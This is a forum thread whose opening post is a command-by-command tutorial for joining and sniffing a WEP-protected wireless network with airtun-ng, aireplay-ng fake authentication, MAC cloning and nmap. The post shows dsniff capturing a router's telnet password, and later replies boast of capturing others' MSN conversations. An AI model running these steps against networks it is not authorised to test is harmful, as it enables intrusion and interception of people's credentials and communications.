Results 1 to 5 of 5

Thread: Using airtun-ng to monitor WLAN in real-time and be joined as a client via injection

  1. #1
    Just burned his ISO
    Join Date
    Feb 2009

    Post Using airtun-ng to monitor WLAN in real-time and be joined as a client via injection

    In this post I will show you how you can use airtun-ng to create a virtual interface which will allow you to monitor WLAN traffic in real-time with an IDS or other packet sniffer, and at the same time, use the virtual interface to inject traffic and essentially become a client of the network.

    The following is the info for the AP in this demonstration:

    essid: airtun-demo
    mac: 00:18:F8:F0:00:01
    wep: 5CE6A435786A4135A512EB6FB5
    channel: 11

    The first thing we will do is make sure our card is in monitor mode on the appropriate channel:
    airmon-ng stop ath0
    airmon-ng start wifi0 11
    Then we will run the following airtun-ng command:
    bt ~ # airtun-ng -a 00:18:F8:F0:00:01 -w 5CE6A435786A4135A512EB6FB5 -t 1 ath0
    created tap interface at0
    WEP encryption specified. Sending and receiving frames through ath0.
    ToDS bit set in all frames.
    "-a" specifies the bssid of the target AP and "-w" is the WEP (I am assuming you already cracked/know it for this example). One important thing is the "-t" option. I specified a value of 1 for this example because I just want to communicate with the AP and/or wired clients. If you change it to 0 this should allow you to communicate with wireless clients. Try playing with this setting if you cannot reach certain hosts.

    Also, if you receive the following error message...
    error opening tap device: No such file or directory
    try "modprobe tun"
    error opening tap device: No such file or directory
    ...just run "modprobe tun" from the shell before starting airtun-ng.

    So now that airtun-ng is running, we can now use any packet capture utility we want to monitor the wireless traffic. This could be your snort IDS software, wireshark for analysis, driftnet to be creepy and grab web pics . I used dsniff here to grab a telnet password to the wireless router:
    bt ~ # dsniff -i at0
    dsniff: listening on at0
    03/07/09 20:15:19 tcp -> DD-WRT.23 (telnet)
    Normally, utilities like these would give you "unknown data-link type" errors when trying to start the capture, but the at0 interface created by airtun-ng replays all traffic for us, decrypted with the WEP, and with the 802.11 info removed so it is now a standard ethernet in the eyes of our sniffer programs.

    Well, this is spectacular, but what if you want to take it further? You can't scan the network or perform MITM attacks without being able to send packets into the network. I guess you could always just use another wireless interface for this part, but that would defeat the purpose of this "how-to"! Also, if you are having trouble connecting to WEP networks with your current card driver, you could actually tunnel all your traffic through airtun-ng and take your driver limitations out of the equation (assuming your card supports injection). Plus, some people may only have 1 interface to work with.

    First, we need to clone the mac of our interface we are using to capture the wireless traffic, and assign it to our at0 interface. Otherwise, the AP will not know what to do with our packets once it receives them. It needs to know the actual physical interface to respond to.
    bt ~ # ifconfig ath0
    ath0      Link encap:UNSPEC  HWaddr 00-15-6D-54-00-01-A8-0F-00-00-00-00-00-00-00-00
              RX packets:11808 errors:0 dropped:0 overruns:0 frame:0
              TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:2880777 (2.7 MiB)  TX bytes:227 (227.0 b)
    ^^ Checking the ath0 MAC

    Now let's assign to our tunnel interface...
    bt ~ # macchanger -m 00:15:6D:54:00:01 at0
    Current MAC: 82:cf:78:7e:22:22 (unknown)
    Faked MAC:   00:15:6d:54:00:01 (unknown)
    Now it is assigned to our virtual interface.

    And 1 final requirement before we can inject traffic, we need to associate ourselves with the target AP. For this we will use a simple command with aireplay-ng.
    bt ~ # aireplay-ng -a 00:18:F8:F0:00:01 --fakeauth 5 ath0
    No source MAC (-h) specified. Using the device MAC (00:15:6D:54:00:01)
    20:13:05  Waiting for beacon frame (BSSID: 00:18:F8:F0:00:01) on channel 11
    20:13:06  Sending Authentication Request (Open System) [ACK]
    20:13:06  Authentication successful
    20:13:06  Sending Association Request [ACK]
    20:13:06  Association successful :-) (AID: 1)
    "-a" is the bssid of our target AP, "--fakeauth 5" says to associate every 5 seconds, and ath0 is our replay interface.

    Now we are good to go.

    Let's bring up the at0 interface... (airtun-ng will always start with the interface down)
    ifconfig at0 up
    Let's see if the AP will give us an address via DHCP.

    bt ~ # dhcpcd at0
    bt ~ # ifconfig at0
    at0       Link encap:Ethernet  HWaddr 00:15:6D:54:00:01
              inet addr:  Bcast:  Mask:
              RX packets:11 errors:0 dropped:0 overruns:0 frame:0
              TX packets:3 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:500
              RX bytes:3290 (3.2 KiB)  TX bytes:1240 (1.2 KiB)
    Ta-da! We are now sniffing all wireless traffic for this AP in promiscuous mode, and are also joined to the network and can inject and receive packets like a normal host. All with the same physical interface.

    Pinging the AP...
    bt ~ # ping
    PING ( 56(84) bytes of data.
    64 bytes from icmp_seq=1 ttl=64 time=4.98 ms
    64 bytes from icmp_seq=2 ttl=64 time=2.33 ms
    64 bytes from icmp_seq=3 ttl=64 time=2.34 ms
    64 bytes from icmp_seq=4 ttl=64 time=2.32 ms
    64 bytes from icmp_seq=5 ttl=64 time=2.33 ms
    --- ping statistics ---
    5 packets transmitted, 5 received, 0% packet loss, time 4001ms
    rtt min/avg/max/mdev = 2.321/2.863/4.984/1.060 ms
    A quick port scan...
    bt ~ # nmap -e at0 -F
    Starting Nmap 4.85BETA3 ( hxxp:// ) at 2009-03-07 20:19 GMT
    Interesting ports on DD-WRT (
    Not shown: 97 closed ports
    23/tcp open  telnet
    53/tcp open  domain
    80/tcp open  http
    MAC Address: 00:18:F8:FC:00:A0 (Cisco-Linksys)
    Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
    You will probably need to specify the interface to use for scanning with nmap. When I didn't it would give me an error and default to eth0. This may be the case with other programs also.

    So there you have it. If anyone has any pointers or criticisms please let me know. Thanks.

  2. #2
    Senior Member
    Join Date
    Jan 2010


    i was just looking around for some airtun-ng related discussion and ended up with your howto thread as a search result. since you took your time to put this together and have gotten no replies; i'd just like to compliment you on it. it's a nice and thoroughly put together how-to about a rather powerful,versatile,(and often overlooked) tool within the aircrack-ng suite. ,granted is an older (2008) blog posted tutorial on airtun-ng/wireshark usage. but it does decently illustrate some of the types of scenario/attacks which are possible via airtun-ng.

  3. #3
    Junior Member imported_painter13's Avatar
    Join Date
    Jul 2008


    Thanks for the tut... Works like a charm!

  4. #4
    Junior Member Isohump's Avatar
    Join Date
    Sep 2009


    Great tut just tried it out.. OH and clone thanks for that link just just learned how to capture MSN conversations ^_^
    One day your life will flash before your eyes. Make sure its worth watching.

  5. #5
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010


    Quote Originally Posted by Isohump View Post
    OH and clone thanks for that link just just learned how to capture MSN conversations ^_^
    Ettercap does that already...

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts